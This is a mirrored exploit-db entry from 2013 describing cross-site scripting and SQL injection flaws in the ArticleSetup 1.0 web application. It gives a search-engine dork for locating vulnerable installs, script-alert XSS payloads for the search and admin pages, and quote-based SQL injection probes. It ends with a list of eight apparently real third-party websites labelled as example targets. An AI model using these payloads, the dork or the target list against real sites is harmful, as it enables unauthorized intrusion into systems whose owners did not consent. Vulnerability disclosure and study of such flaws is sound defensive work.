bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/28564.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

53 lines
No EOL
1.5 KiB
Text
Executable file
Raw Blame History

#Exploit Title : ArticleSetup Multiple Vulnerabilities
#Author : DevilScreaM
#Date : 21/09/2013
#Category : Web Applications
#Vendor : http://www.articlesetup.com/
#Version : 1.0
#Dork
intext:Powered By Article Marketing
#Vulnerability : Cross Site Scripting , SQL Injection
#Tested On : Windows 7, Ubuntu (Mozila & Chrome)
#Greetz : Newbie-Security.or.id, Banjarmasin Hacker, Borneo Hacker
Cross Site Scripting
http://site-target/search.php?s=[XSS]
Example
http://www.freearticle.com.au/search.php?s=<script>alert('DevilScreaM')</script>
#XSS at Page Admin
http://site-target/admin/search.php?s=<script>alert('DevilScreaM')</script>
===================================================================================
SQL Injection Vulnerability
http://site-target/feed.php?cat=[SQL Injection]
http://site-target/search.php?s=[SQL Injection]
Example
http://www.freearticle.com.au/feed.php?cat=100'
http://www.freearticle.com.au/search.php?s=123'
====================================================================================
Example Target
http://freearticle.com.au/feed.php?cat=100'
http://alfithrah99.net/artikel/feed.php?cat=2'
http://demos1.softaculous.com/ArticleSetup/feed.php?cat=100'
http://oromodictionary.com/articles/feed.php?cat=1'
http://beingshoppers.com/article/feed.php?cat=44'
http://acheon.eu/article/feed.php?cat=54'
http://sitevena.com/feed.php?cat=12'
http://www.articleshub.in/feed.php?cat=10'
Reference in a new issue View git blame Copy permalink